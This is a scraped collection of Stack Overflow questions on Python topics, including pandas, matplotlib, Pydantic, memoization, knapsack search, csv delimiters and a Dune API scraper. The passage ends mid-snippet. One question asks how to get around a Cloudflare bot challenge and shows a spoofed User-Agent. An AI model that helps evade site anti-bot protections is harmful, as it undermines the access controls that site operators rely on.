<h2>My research and solution attempt</h2>
<p>Since this is my first Python code, I have browsed a number of <a href="https://stackoverflow.com/questions/34338788/python-replace-3-random-characters-in-a-string-with-no-duplicates">Python</a> and <a href="https://stackoverflow.com/a/34800817/1469208">non-Python</a> related <a href="https://stackoverflow.com/q/32119073/1469208">questions</a> here and on <a href="https://pandas.pydata.org/pandas-docs/stable/reference/api/pandas.Series.str.replace.html" rel="nofollow noreferrer">the net</a>, and have come up with the following idea:</p>
<pre><code>import random

def swap_charcter(message, character, mask):
    the_list = list(message)
    for i in random.sample(range(len(the_list)), len(list(mask))):
        the_list[i] = random.choice(mask)
    return message.join(the_list)

# print(swap_charcter('tested', 'e', '!#'))
print(swap_charcter('tested', 'e', '→☺☻♥♦♣♠•◘○§¶▬↨↑↓←∟↔'))
</code></pre>
<p>But... I must be doing something wrong, because each time I run this (or many, many other) pieces of code with just a space as an argument, I get the <em>Sample larger than population or is negative</em> error.</p>
<p>Can someone help here a little bit? Thank you.</p>
<p><strong>EDIT</strong>: <em>I have replaced <code>list(character)</code> → <code>list(message)</code>, as suggested in the comments</em>.</p>
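<p>For reference, a minimal sketch of the two directions (the function names are mine): each space gets an independent <code>random.choice</code> from the mask, and <code>str.translate</code> maps every mask character back to a space. This assumes the haystack itself never contains mask characters:</p>

```python
import random

MASK = '→☺☻♥♦♣♠•◘○§¶▬↨↑↓←∟↔'

def hide_spaces(text, mask=MASK):
    # replace every space with a randomly picked mask character
    return ''.join(random.choice(mask) if ch == ' ' else ch for ch in text)

def restore_spaces(text, mask=MASK):
    # map every mask character back to a single space
    return text.translate({ord(ch): ' ' for ch in mask})

source = '"El Niño" "Hi there! How was class?"'
encoded = hide_spaces(source)
print(encoded)
print(restore_spaces(encoded) == source)  # True
```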
|
<python><replace><unicode><space>
|
2023-05-22 01:13:47
| 2
| 17,573
|
trejder
|
76,302,435
| 5,212,614
|
How can we merge column headers from multiple CSVs into one dataframe, and list source file names for each file in one column?
|
<p>Here is the code that I am testing.</p>
<pre><code># import necessary libraries
import pandas as pd
import os
import glob

# use glob to get all the csv files
# in the folder
path = 'C:\\Users\\'
csv_files = glob.glob(os.path.join(path, "*.csv"))
csv_files

df_headers = pd.DataFrame()

# loop over the list of csv files
for f in csv_files:
    #print(type(f))
    # read the csv file
    df = pd.read_csv(f, nrows=1)
    print(df.shape)
    df_headers = pd.concat([df_headers, df], axis=0)
    df_headers['file_name'] = f

df_headers.to_csv('C:\\Users\\ryans\\Desktop\\out.csv')
</code></pre>
<p>This almost works, but it always writes the last file name to the <code>file_name</code> column in <code>df_headers</code>, so only the last file that the loop goes through is actually listed in <code>file_name</code>.</p>
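<p>A hedged fix sketch: tag each header row with its own source file <em>before</em> concatenating, so the value is stored per row instead of overwriting the whole column on every iteration (the temporary files below just make the example self-contained):</p>

```python
import os
import tempfile

import pandas as pd

# Create two tiny CSVs so the example is self-contained.
tmp = tempfile.mkdtemp()
for name, header in [('a.csv', 'x,y'), ('b.csv', 'y,z')]:
    with open(os.path.join(tmp, name), 'w') as fh:
        fh.write(header + '\n1,2\n')

frames = []
for f in sorted(os.listdir(tmp)):
    df = pd.read_csv(os.path.join(tmp, f), nrows=1)
    df['file_name'] = f      # set per file, before the concat
    frames.append(df)

df_headers = pd.concat(frames, ignore_index=True)
print(df_headers['file_name'].tolist())  # ['a.csv', 'b.csv']
```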
|
<python><python-3.x><pandas><dataframe><loops>
|
2023-05-22 00:26:18
| 1
| 20,492
|
ASH
|
76,302,219
| 2,840,680
|
Modify the legend placement of a figure
|
<p>I am using a package program that returns a <code>matplotlib.figure</code> object together with a legend. I want to change the bounding box and placement of the legend. After checking <a href="https://matplotlib.org/stable/api/figure_api.html" rel="nofollow noreferrer">https://matplotlib.org/stable/api/figure_api.html</a> I tried to retrieve the legend as follows:</p>
<pre><code>ax = f.axes[0]
lgd_f = f.legend()
lgd = ax.get_legend_handles_labels()
print(lgd_f)
print(lgd)
ax.get_legend().set_bbox_to_anchor((1, 1.05))
ax.legend(bbox_to_anchor=(1, 1.05), loc=8)
</code></pre>
<p>However, this did not work as expected: calling the <code>get_legend_handles_labels</code> method on the axes returns two empty lists. Unfortunately it is not possible to modify the internals of the package program. Assuming this is possible, could you point me in the right direction?</p>
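<p>One thing worth checking (a sketch, not specific to your package): a legend created at the figure level is stored in <code>fig.legends</code>, not on the axes, in which case <code>ax.get_legend()</code> returns <code>None</code> and the handles/labels lists are empty:</p>

```python
import matplotlib
matplotlib.use('Agg')  # non-interactive backend for the sketch
import matplotlib.pyplot as plt

fig, ax = plt.subplots()
ax.plot([0, 1], [0, 1], label='line')
fig.legend()  # figure-level legend, as a package might create it

# Look for the legend on the axes first, then fall back to the figure.
leg = ax.get_legend() or (fig.legends[0] if fig.legends else None)
if leg is not None:
    leg.set_bbox_to_anchor((1, 1.05))
```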
|
<python><matplotlib><legend>
|
2023-05-21 22:44:18
| 1
| 785
|
Vesnog
|
76,302,191
| 9,506,773
|
What to test in a CI run vs pytest, and why
|
<p>I have a Python repo on GitHub. If I understood correctly, there are mainly two ways in which tests can be automated:</p>
<ul>
<li>using <code>run</code> in a <code>ci.yml</code> file</li>
<li>using <code>test_...</code> files under a folder called <code>test</code> (at root level) and then execute them in the ci pipeline by running <code>pytest tests</code></li>
</ul>
<p>What type of tests are more suitable for each of these options? And why?</p>
|
<python><github><testing><pip><continuous-integration>
|
2023-05-21 22:32:21
| 1
| 3,629
|
Mike B
|
76,302,149
| 9,352,077
|
imshow with twinx that is also aligned with tiles
|
<p>There <a href="https://stackoverflow.com/questions/48255824/matplotlib-imshow-with-second-y-axis">is a thread</a> where the question was to add an automatically labelled <code>twinx</code> to Matplotlib's <code>imshow</code>. The result was:</p>
<p><a href="https://i.sstatic.net/50zmU.png" rel="nofollow noreferrer"><img src="https://i.sstatic.net/50zmU.png" alt="" /></a></p>
<p>However, I would like the ticks on the second y-axis to be 1. manually settable and 2. aligned with the other ticks. Example output drawn in Paint:</p>
<p><a href="https://i.sstatic.net/VDB8R.png" rel="nofollow noreferrer"><img src="https://i.sstatic.net/VDB8R.png" alt="" /></a></p>
<p><em>Furthermore, I want to stretch the grid tiles so that the entire grid becomes a <strong>square</strong>, by using the <code>imshow</code> argument <code>aspect=4/8</code>.</em></p>
<p>If you set the aspect ratio and follow <a href="https://stackoverflow.com/a/45446097/9352077">this thread</a>, you get extra whitespace around the graph like in <a href="https://github.com/matplotlib/matplotlib/issues/1789/" rel="nofollow noreferrer">this thread</a>. Both of them claim that the solution is to use <code>set_adjustable('box-forced')</code>, but this seems to have been removed. When I try it, Matplotlib says</p>
<pre><code>ValueError: 'box-forced' is not a valid value for adjustable; supported values are 'box', 'datalim'
</code></pre>
<p>When I try <code>box</code>, I get:</p>
<pre><code>RuntimeError: Adjustable 'box' is not allowed in a twinned Axes; use 'datalim' instead
</code></pre>
<p>And using <code>datalim</code>, the white space is not removed. How do you do this in 2023?</p>
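<p>A possible alternative sketch (assuming the second axis is just a relabelling of the first, not independent data): <code>secondary_yaxis</code> shares the primary axes' data coordinates and respects the aspect setting, so it sidesteps the twinned-axes <code>adjustable</code> restriction. Tick positions and labels here are placeholders:</p>

```python
import matplotlib
matplotlib.use('Agg')
import numpy as np
import matplotlib.pyplot as plt

data = np.random.default_rng(0).random((8, 4))
fig, ax = plt.subplots()
ax.imshow(data, aspect=4 / 8)  # stretch tiles so the grid is square

# Secondary y-axis in the same data coordinates, with manual ticks
# placed exactly where the primary ticks are.
sec = ax.secondary_yaxis('right')
sec.set_yticks(ax.get_yticks())
sec.set_yticklabels([f'{t:g}s' for t in ax.get_yticks()])
```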
|
<python><matplotlib><imshow><twinx><yticks>
|
2023-05-21 22:17:12
| 1
| 415
|
Mew
|
76,301,901
| 1,259,561
|
Why does timeit result in almost constant time for all memoization runs?
|
<p>We compute the Fibonacci number:</p>
<pre class="lang-py prettyprint-override"><code>def fibo_memo(i, memo={}):
    if i <= 0:
        return 0
    elif i == 1:
        return 1
    elif i in memo:
        return memo[i]
    else:
        memo[i] = fibo_memo(i-2, memo) + fibo_memo(i-1, memo)
        return memo[i]

def fibo_dp(i):
    if i <= 0:
        return 0
    elif i == 1:
        return 1
    dp = [0] * (i + 1)
    dp[1] = 1
    for j in range(2, i + 1):
        dp[j] = dp[j-1] + dp[j-2]
    return dp[i]

assert(fibo_memo(100) == fibo_dp(100))
</code></pre>
<p>Now time it:</p>
<pre><code>i = 10
%timeit fibo_memo(i) # 73 ns
%timeit fibo_dp(i) # 309 ns
i = 100
%timeit fibo_memo(i) # 73 ns
%timeit fibo_dp(i) # 2.54 micro seconds
i = 1000
%timeit fibo_memo(i) # 73 ns
%timeit fibo_dp(i) # 33 micro seconds
</code></pre>
<p>Why does memoization result in almost constant time, unlike dynamic programming?</p>
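<p>One detail that matters for the timing setup: a mutable default argument like <code>memo={}</code> is created once, at function definition time, and shared by every subsequent call, including all of <code>%timeit</code>'s repetitions. A minimal illustration:</p>

```python
def cached(i, memo={}):
    # memo is created once and persists across calls
    memo[i] = True
    return len(memo)

print(cached(1))  # 1
print(cached(2))  # 2
print(cached(2))  # 2 -- the dict from earlier calls is still there
```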
|
<python><performance><dynamic-programming><memoization>
|
2023-05-21 20:59:51
| 1
| 3,659
|
THN
|
76,301,828
| 3,482,266
|
How to set a Pydantic field value depending on other fields
|
<pre class="lang-py prettyprint-override"><code>from pydantic import BaseModel

class Grafana(BaseModel):
    user: str
    password: str
    host: str
    port: str
    api_key: str | None = None

    GRAFANA_URL = f"http://{user}:{password}@{host}:{port}"
    API_DATASOURCES = "/api/datasources"
    API_KEYS = "/api/auth/keys"
</code></pre>
<p>With Pydantic I get "unbound variable" error messages for <code>user</code>, <code>password</code>, etc. in <code>GRAFANA_URL</code>.</p>
<p>Is there a way to solve this? In a regular class, I would just create <code>GRAFANA_URL</code> in the <code>__init__</code> method. With Pydantic, I'm not sure how to proceed.</p>
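<p>One possible sketch (only one of several options; field names follow the model above): expose the URL as a plain <code>property</code> computed from the validated fields, which avoids declaring it as a model field altogether:</p>

```python
from pydantic import BaseModel

class Grafana(BaseModel):
    user: str
    password: str
    host: str
    port: str

    @property
    def grafana_url(self) -> str:
        # computed from the validated fields on each access
        return f"http://{self.user}:{self.password}@{self.host}:{self.port}"

g = Grafana(user='u', password='p', host='h', port='3000')
print(g.grafana_url)  # http://u:p@h:3000
```

<p>Pydantic also offers validators (and, in v2, computed fields) if the value should live on the model itself.</p>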
|
<python><pydantic>
|
2023-05-21 20:35:57
| 1
| 1,608
|
An old man in the sea.
|
76,301,807
| 12,144,502
|
Comparison of BFS and DFS algorithm for the Knapsack problem
|
<p>I am fairly new to Python and I have a task that asks me to compare both algorithms' time expended and memory used.</p>
<p>I have coded both algorithms and run them. I was able to measure the time used, but wasn't able to find a way to measure how much memory was used. I am also not sure if the question is asking me to calculate it based on BFS and DFS in general or on the code I have written.</p>
<blockquote>
<p>Comparison of the time expended by the algorithms.</p>
<p>Comparison of the space used in memory at a time by the algorithms</p>
</blockquote>
<p>To get the time I used <code>start_time = time.time()</code> and <code>end = time.time()</code></p>
<pre><code>BFS algorithm
0.0060007572174072266s
DFS algorithm
0.005002260208129883s
</code></pre>
<p>How would I calculate the memory used, assuming it is based on my code? I might just be confused, but the wording of the question makes me feel like I need to measure it when running both algorithms to compare their performance.</p>
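<p>One standard-library option (a sketch; <code>run_search</code> is a stand-in for either of your functions) is <code>tracemalloc</code>, which reports the current and peak Python-allocated memory while the code runs:</p>

```python
import tracemalloc

def run_search():
    # stand-in for knapsack_bfs(items, max_weight) or knapsack_dfs(...)
    return [list(range(100)) for _ in range(100)]

tracemalloc.start()
run_search()
current, peak = tracemalloc.get_traced_memory()
tracemalloc.stop()
print(f"current={current} B, peak={peak} B")
```

<p>Comparing the <code>peak</code> values of the two runs gives a direct measure of "space used in memory at a time".</p>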
<hr />
<p><strong>Code</strong>:</p>
<p><em>BFS</em> :</p>
<pre><code>def knapsack_bfs(items, max_weight):
    queue = deque()
    root = Node(-1, 0, 0, [])
    queue.append(root)
    max_benefit = 0
    best_combination = []
    while queue:
        current = queue.popleft()
        if current.level == len(items) - 1:
            if current.benefit > max_benefit:
                max_benefit = current.benefit
                best_combination = current.items
        else:
            next_level = current.level + 1
            next_item = items[next_level]
            include_benefit = current.benefit + next_item.benefit
            include_weight = current.weight + next_item.weight
            if include_weight <= max_weight:
                include_node = Node(next_level, include_benefit,
                                    include_weight, current.items + [next_item.id])
                if include_benefit > max_benefit:
                    max_benefit = include_benefit
                    best_combination = include_node.items
                queue.append(include_node)
            exclude_node = Node(next_level, current.benefit,
                                current.weight, current.items)
            queue.append(exclude_node)
    return max_benefit, best_combination
</code></pre>
<p><em>DFS</em>:</p>
<pre><code>def knapsack_dfs(items, max_weight):
    queue = []
    root = Node(-1, 0, 0, [])
    queue.append(root)
    max_benefit = 0
    best_combination = []
    while queue:
        current = queue.pop()
        if current.level == len(items) - 1:
            if current.benefit > max_benefit:
                max_benefit = current.benefit
                best_combination = current.items
        else:
            next_level = current.level + 1
            next_item = items[next_level]
            include_benefit = current.benefit + next_item.benefit
            include_weight = current.weight + next_item.weight
            if include_weight <= max_weight:
                include_node = Node(next_level, include_benefit,
                                    include_weight, current.items + [next_item.id])
                if include_benefit > max_benefit:
                    max_benefit = include_benefit
                    best_combination = include_node.items
                queue.append(include_node)
            exclude_node = Node(next_level, current.benefit,
                                current.weight, current.items)
            queue.append(exclude_node)
    return max_benefit, best_combination
</code></pre>
<p>Edit:</p>
<p>Results based on the answer below:</p>
<pre><code>program.py:42: size=4432 B (+840 B), count=79 (+15), average=56 B
program.py:116: size=0 B (-768 B), count=0 (-1)
program.py:79: size=0 B (-744 B), count=0 (-13)
program.py:85: size=0 B (-72 B), count=0 (-1)
program.py:57: size=0 B (-56 B), count=0 (-1)
program.py:56: size=0 B (-56 B), count=0 (-1)
program.py:74: size=0 B (-32 B), count=0 (-1)
program.py:37: size=32 B (+0 B), count=1 (+0), average=32 B
</code></pre>
|
<python><python-3.x><algorithm><knapsack-problem>
|
2023-05-21 20:28:39
| 1
| 400
|
zellez11
|
76,301,728
| 7,533,650
|
Getting around "Enable JavaScript and cookies to continue" error when web scraping w/ Python
|
<p>I recently wrote a script to scrape the front end of a website, but have recently run into issues with enabling JavaScript and cookies so I can pull the data. I'm not sure if this is a new captcha that was implemented, but I have made several attempts at getting around this error, shown below:</p>
<pre><code>Traceback (most recent call last):
File "/opt/homebrew/lib/python3.9/site-packages/requests/models.py", line 910, in json
return complexjson.loads(self.text, **kwargs)
File "/opt/homebrew/lib/python3.9/site-packages/simplejson/__init__.py", line 525, in loads
return _default_decoder.decode(s)
File "/opt/homebrew/lib/python3.9/site-packages/simplejson/decoder.py", line 370, in decode
obj, end = self.raw_decode(s)
File "/opt/homebrew/lib/python3.9/site-packages/simplejson/decoder.py", line 400, in raw_decode
return self.scan_once(s, idx=_w(s, idx).end())
simplejson.errors.JSONDecodeError: Expecting value: line 1 column 1 (char 0)
During handling of the above exception, another exception occurred:
Traceback (most recent call last):
File "/Users/user/Desktop/Scripts/scrape/untitled.py", line 21, in <module>
data = DuneData('01GZ9A6BJ85ZJSQWVG2RVXY2XJ',188664)
File "/Users/user/Desktop/Scripts/scrape/untitled.py", line 16, in DuneData
data = requests.post(api_url, json=payload, headers=headers).json()
File "/opt/homebrew/lib/python3.9/site-packages/requests/models.py", line 917, in json
raise RequestsJSONDecodeError(e.msg, e.doc, e.pos)
requests.exceptions.JSONDecodeError: [Errno Expecting value] <!DOCTYPE html>
<html lang="en-US">
<head>
<title>Just a moment...</title>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=Edge">
<meta name="robots" content="noindex,nofollow">
<meta name="viewport" content="width=device-width,initial-scale=1">
<link href="/cdn-cgi/styles/challenges.css" rel="stylesheet">
</head>
<body class="no-js">
<div class="main-wrapper" role="main">
<div class="main-content">
<noscript>
<div id="challenge-error-title">
<div class="h2">
<span class="icon-wrapper">
<div class="heading-icon warning-icon"></div>
</span>
<span id="challenge-error-text">
Enable JavaScript and cookies to continue
</span>
</div>
</div>
</noscript>
<div id="trk_jschal_js" style="display:none;background-image:url('/cdn-cgi/images/trace/managed/nojs/transparent.gif?ray=7caf65968a49e71a')"></div>
<form id="challenge-form" action="/v1/graphql?__cf_chl_f_tk=blBqvLjLbA8FPaIGpKKwah.JvllhTMlA.UhXCSc1XXs-1684699134-0-gaNycGzNDPs" method="POST" enctype="application/x-www-form-urlencoded">
<input type="hidden" name="md" value="295Z8glK_610pCxAx3lV2daoYOQlQfzgh9M8J.xym9Q-1684699134-0-AYkSDJTle9beyLVvfmcSmQFGxQJa_7grQNKxDDtnS3Uk3LAzUVM0pGZldf1kAk0588IkaC4OxYsJktXypW8XxQuvLNh4i5A5s-jvQ8PLTd2GDCy2ICGwmMKEmZE2L29YLKvea2XdHC_2KfLGehRoOi9ZuVHOPj6OD75anQdCnFWacAH1Rtn5w9HBtFz_aIxardEYmJ2jpeCisFBFfYpq23uX29XMmyGJPpIXV3186PZMlyFyGT9Ho3E5JIL-sICGvzDjZThj-Z7MCkH4qIAip85TBQPWz2rg0MSteZ7ivlq_vFZ6pgBkcuW2fvDYRRFRchjtezQ7bA1O3CavYjses5IiU7UwO_-lgnXGZLN0NQua8x8N34WKyJfOIKf5EKaFSHqoTTFTZSt_DuAH0BtMgNUffY-XGgu7o8PA9p_l-QrHFXVYB8BOJZbA9NhYjsBk3d_hq6NzQ_T748Nbp9jofxv1NL8vykCZTgKlRgiHxu686nH55DW0rfgBWsoWU6o1JbPIJ8WuWrQES2LklH22fOVFg6YsCpQuk-9ZvvCGUT_64Q7SCJ2xrwvTXASkyuQUIwYD9-q3Ja9VVAPeVSPE0_el-4-UGL10iSw8AIubzzbwyb7Y8Ps8lWXlV5NrhIMwquLX19LWiUqPDaNnnSwTStoFYIM55HGD9rUL0FZhz_AGoJDBP5qGFE7-qR2YjyZ7R2oLQON9aR3oqz5hLIKxgK748uZ-HqX48L84v9UTZLLyaJVaKmJosTKCYhyxdXquaaxnftWP3h8alAjXfLb2dPofVOh9YZCIE8n0S0Wp4MZ7hNnSf4XT-A9vDCuJSj_3iubfaZg1rpFpzoXeARnAJYwwO3ZNsai51v5lyYmWalpHR7QzDypX99PATde6cOi_JwZouz5PanOHzgE5QZyqcf1RDR_GvoGDZPWEiy0v44saewnWtW6dg8BhxUVV9kd-n1MhW3WG-rrVgATKFst2FvVm33ULu69ff_cLa3H5Sw4fvNLSfpT5mvs57Yu9wEdj9RX9tzZAcULzOgDywwZXnkxTsZEutxCHgkcS5SWPC5CRn_4R-zLv6a2iQcl2J0igYaI35AAg0QJg1nuwltsJZPxIjM7Yyb13BhGRdtRZd6zj4CpFJB8F4EkhrTok4S08GE6Omol66xy6emsAPui-j5iOHoqKHYjECxjDKDmE4A5RpYE2NrY45m9ENtbuTN73A_gpqT0hRGsZX93QIUJJw0aCWfxxaMfdGMNUh0gQYfgRiyZpJdNDKYaaCUYX55WniybSlLkTjY_K8fVZqMLXYXE1PeMqebL04jsN6cqWP7Ch_-Ng7_zTqY_-keFgrf6Jg5Cd2SuDcMoNmXIvRIgON2BavVyawTE-c_fnpeC9p_GebCScrMIBvZf63WhEoEu-UlCWm21762jXgKptb3Y7XCelpzxTjmHumlxyzcpHKcJKR3OksTqQzTXjYC1qn52mVVO7arsZIwNXH90njhOXV_e6qOeqZsW-kmoF6NyxuY0WHuMEWesFbJstEQuYD-ni1ZyvqZpfaQwWSEMh203nh30rIK36MpfHp2O0TrIYITkoeQPZfqvAnY1st2EkfJMurJCbboJjFsPYHvV_hFORCCs6lBAjxsDUEOKBVHbIoxa9s1DtkK48UpHzHZdXASJB_5UZXgdksYV6QfFKEsbm7yaPQJxiEXxo0ZMonHT2IX7stErAZWWFOwbvfflxDAD_VeCkaMcGX2IlQiuqDfO-nNVB69jPTjYhJIBcqNN4aDUUBBKwlhQwNfpfq76w9TOZw6Xg7hE6zZpbYGLfjn2EX9W7Ei46ZrrAndKSjBqMUGYGLPoGv85WMwRnxMg-voHXWaulJzaEpKuUPhYryrRtb2v695mbcurPnZI_VcLsZ-yu1WhKL
fCl_g9mvUPmNdM84Sb4zKSOVlMjdCQz899kEeYbAeES_WxSG2Qcgc3zk2P6iuqYy9heGR8xfCaqjw-xHGjSIsED8cdf9W_N6TIulV7ImQwyacAREosCu9qo7IQurdvK3oZxli0gFLCpqI3MisdhSQF9RSg3Cxp2oYoZV8Jaxbu903FQ3IM78CzgjkT78bmAKBr-i71ypKjCxgqMF2VVkiRV_aIWUm35T7hAzbXoOY51CE5xT2n0a_LYokAvQDKrsmDKb7dJ1xGjXmntZQXvakacrzBFi7dPFtxTxXoUKYAoZoZLQoh8NDLDbA4kA6IljZdc4YxtnjKineArbW3wc3U6iKb0rX4SQGoSOKxKwDf3K1i2JXUqstR_vL-1ksQr7voa29TeKgwFH-rwYDWuIy5Ny7GLu_xJM9qFEOFQ16zSgZn9NmBEdq7lJEBzmXR2ShmbffPYfssWqtw3EJMWy1Khm98X_u-cZNMYZ4pc_MfynVn8czDpgJ1VEQkNi2PezLUy7PI1lgdb2ENIE_WL2tuFhwifwJq7mUWgNzPJb9SZcMTahufMRTndZ-852vtxt-n8QzrPCJJYUjYvasqJkcrmYgyT6rINdhBFVlu2ROAyi8Z-J8_olGjU5YPL-L_JbqdBixzmGuG_OYnFLJmeuufmaY2-oCE4zcCcPFym7YC8kNjARiCWKM1P72WhvoiS_SdvbQ6sO6YklgUz9jPR1ZkxUp4_QebsA_mIWmeEAiNdgXIa8wfOiUH_bTd7IbvFYg6M59EZ_e8dv_XUEji1IE5eZpSMmhg3daPKnL6-Y-M4e6nFSX_iuq4SEk0k5GWcG9hdBScB-QQyTIanCq6o5-KfPanSsSDLH8o1-on3N5XaBktHn_Ob6gQMINNlPxziVLM-ImnM-L6dMAX2qRm1s7nvc16oUoJXaDmD-xNYEAXZAhLceZqH4zloq0EdwmjrknKITaSc3dCrmwZMBZPiTd3wEZhBg5GXSjcaxzX1QupGMkFmzqBN70ACQnumXQX-DQbvSxE_ao-sbo2dnWeOu8mdF2dcDU-1paVhEQ7eR1xdXmvF_tMyek_-uNRixMXcRcB0w59_nZ9M_inAq3bsslAKCoJUSwRAhngChQdE209MtX8sSbbueh2tSCbRXCTL0cLho4s8pQ6gYIWklvgHzUDW4ZuXt8HfDdXnAPbeFxQ4aZRu9sLVJ4Tc06p7lyiXmjoKMsFc68_eqHAtlNUpY2V20ayVzZ4cje1_Se_WIF23SvhtMVBpAC8KFqIgR5DB8_sgVC_y3kU8Booh50OmxzVDA7jvp6loiKbwg12pWhzS2LAjBE85-qAWXn55jtV4rKLs9uYhVaWOfkozhw">
</form>
</div>
</div>
<script>
(function(){
window._cf_chl_opt={
cvId: '2',
cZone: 'app-api.dune.com',
cType: 'managed',
cNounce: '65522',
cRay: '7caf65968a49e71a',
cHash: '6c4060ac4ff2016',
cUPMDTk: "\/v1\/graphql?__cf_chl_tk=blBqvLjLbA8FPaIGpKKwah.JvllhTMlA.UhXCSc1XXs-1684699134-0-gaNycGzNDPs",
cFPWv: 'g',
cTTimeMs: '1000',
cMTimeMs: '0',
cTplV: 5,
cTplB: 'cf',
cK: "",
cRq: {
ru: 'aHR0cHM6Ly9hcHAtYXBpLmR1bmUuY29tL3YxL2dyYXBocWw=',
ra: 'TW96aWxsYS81LjAgKE1hY2ludG9zaDsgSW50ZWwgTWFjIE9TIFggMTBfMTFfNSkgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgQ2hyb21lLzUwLjAuMjY2MS4xMDIgU2FmYXJpLzUzNy4zNg==',
rm: 'UE9TVA==',
d: 'UAzhxxUCtDccqA6vMBsg/7niq6oMPgbOVdY+iNzuAUS6ZmcPyjtmDmyI0xUwFKNjzJlY3YrrTM1yWC2sBHNMyk1uv84QzxvlhN9yKm4XWbzE9BK7Z7TXo8KsbuxhDx1fYR71mDg3XJgKiHE657DJNkhLl9fVOxlxuLhxa8pNiEk4KfYNM3mYzltrTnhqQflGJj9QQRIumAheW/gX2RnZtOV/6i5RnT7C9xku3MXKhs4yq0FWPTRODVE4W/7WC3+YqQhQqqsXx/UPZWLkvlEyw3UHS4azv1L3TFLLC6cyCyJLE6xyfd9Rqvgdo9+bTxzHgbNdFllwSTKLBVUemRPg+NSjr+nVLpt1o99Sr6VNETp1ngYFHrwvAf1aeGYTl934DVJo9Qgb+ae2Lw4wvgTbIe5/B6GBq034Fdk/EtDurH7RTp02ZOBL1ur2Xc2XK4mH7IJyDwVpHV8Hbevbcu0iQR5isfkKZ8+Ix1RpzB4QTvQPjm1x2EQZdQkdcmMhxypGLgNlukO+IVD7n8Re0jmbuOqsFH5NreWU+zQTwGGPKjztbiN52EqsrYKz70XExXAi6NZxDQBVwanJKdcygxs4Txw69hyclRTWPd2nDwPrFTRTTE9nd3EGk8kTCLXxsipW',
t: 'MTY4NDY5OTEzNC40ODYwMDA=',
m: 'M8BdHRfTrOf1LRwcXamVDQjRvhPG/MZcC1/YvCerKWM=',
i1: 'KAhWT5sfGsmG/7wBM0w6HA==',
i2: 'PblavcYHIGXiH36OyaJAng==',
zh: 'GMVzRUL66vF6Z+RS/U7IfESF77Uae1L4u0J3S5ERVB8=',
uh: 'MJnL4yXqlDXgoEFDXJrrYdndq9vyeF7u7u/p5sDi8wY=',
hh: '5gwOidb9xMEjxVD8VFukAZuTqZw/xQPgB7PhXIdMr9A=',
}
};
var trkjs = document.createElement('img');
trkjs.setAttribute('src', '/cdn-cgi/images/trace/managed/js/transparent.gif?ray=7caf65968a49e71a');
trkjs.setAttribute('alt', '');
trkjs.setAttribute('style', 'display: none');
document.body.appendChild(trkjs);
var cpo = document.createElement('script');
cpo.src = '/cdn-cgi/challenge-platform/h/g/orchestrate/managed/v1?ray=7caf65968a49e71a';
window._cf_chl_opt.cOgUHash = location.hash === '' && location.href.indexOf('#') !== -1 ? '#' : location.hash;
window._cf_chl_opt.cOgUQuery = location.search === '' && location.href.slice(0, location.href.length - window._cf_chl_opt.cOgUHash.length).indexOf('?') !== -1 ? '?' : location.search;
if (window.history && window.history.replaceState) {
var ogU = location.pathname + window._cf_chl_opt.cOgUQuery + window._cf_chl_opt.cOgUHash;
history.replaceState(null, null, "\/v1\/graphql?__cf_chl_rt_tk=blBqvLjLbA8FPaIGpKKwah.JvllhTMlA.UhXCSc1XXs-1684699134-0-gaNycGzNDPs" + window._cf_chl_opt.cOgUHash);
cpo.onload = function() {
history.replaceState(null, null, ogU);
};
}
document.getElementsByTagName('head')[0].appendChild(cpo);
}());
</script>
</body>
</html>
: 0
</code></pre>
<p>Anyone have suggestions, thoughts, or ideas? My code is down below.</p>
<pre><code>import requests
import pandas as pd
from bs4 import BeautifulSoup
def DuneData(execution_id, query_id):
api_url = "https://app-api.dune.com/v1/graphql"
headers = {'User-Agent':'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36'}
payload = {
"operationName": "GetExecution",
"query": "query GetExecution($execution_id: String!, $query_id: Int!, $parameters: [Parameter!]!) {\n get_execution(\n execution_id: $execution_id\n query_id: $query_id\n parameters: $parameters\n ) {\n execution_queued {\n execution_id\n execution_user_id\n position\n execution_type\n created_at\n __typename\n }\n execution_running {\n execution_id\n execution_user_id\n execution_type\n started_at\n created_at\n __typename\n }\n execution_succeeded {\n execution_id\n runtime_seconds\n generated_at\n columns\n data\n __typename\n }\n execution_failed {\n execution_id\n type\n message\n metadata {\n line\n column\n hint\n __typename\n }\n runtime_seconds\n generated_at\n __typename\n }\n __typename\n }\n}\n",
"variables": {
"execution_id": execution_id,
"parameters": [],
"query_id": query_id}}
data = requests.post(api_url, json=payload, headers=headers).json()
df = pd.DataFrame(data["data"]["get_execution"]["execution_succeeded"]["data"])
return(df)
data = DuneData('01GZ9A6BJ85ZJSQWVG2RVXY2XJ',188664)
dates = data['date'].tolist()
dates = [x.split('T')[0] for x in dates]
loans = data['Total Value Locked'].tolist()
print(dates, loans)
</code></pre>
|
<python><python-3.x><web-scraping><python-requests>
|
2023-05-21 20:07:52
| 0
| 303
|
BorangeOrange1337
|
76,301,694
| 6,223,346
|
TypeError - read csv functionality
|
<p>I am getting a TypeError when reading a CSV file that uses the bell character as its separator. I don't want to use pandas; I need to use the <code>csv</code> library for this.</p>
<p>Sample header:</p>
<pre><code>["header1", "header2", "header3"]
</code></pre>
<p>Data types</p>
<pre><code>[integer, string, integer]
</code></pre>
<p>Sample data:</p>
<pre><code>"2198"^G"data"^G"x"
"2199"^G"data2"^G"y"
"2198"^G"data3"^G"z"
</code></pre>
<p>Sample code</p>
<pre><code>import csv

def main():
columns = ['col1', 'col2', 'col3']
try:
csv_dict_list = []
with open("bell.csv", "r") as file:
reader = csv.DictReader(file, delimiter=r'\a', quoting=csv.QUOTE_ALL, skipinitialspace=True, fieldnames=columns)
for row in reader:
print(row)
csv_dict_list.append(row)
except Exception as e:
raise Exception("Unable to read file: %s" % e)
</code></pre>
<p>I get this error -</p>
<pre><code>TypeError: "delimiter" must be a 1-character string
</code></pre>
<p>Bell character reference - <a href="https://www.asciihex.com/character/control/7/0x07/bel-bell-alert" rel="nofollow noreferrer">https://www.asciihex.com/character/control/7/0x07/bel-bell-alert</a></p>
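<p>A minimal, self-contained reproduction (not the asker's file) showing that <code>csv</code> accepts the one-character BEL delimiter <code>'\a'</code> while the raw string <code>r'\a'</code> is two characters and triggers the 1-character error:</p>

```python
import csv
import io

# '\a' is the single BEL control character (0x07); r'\a' is two characters,
# a backslash and an 'a', which is what triggers the 1-character error.
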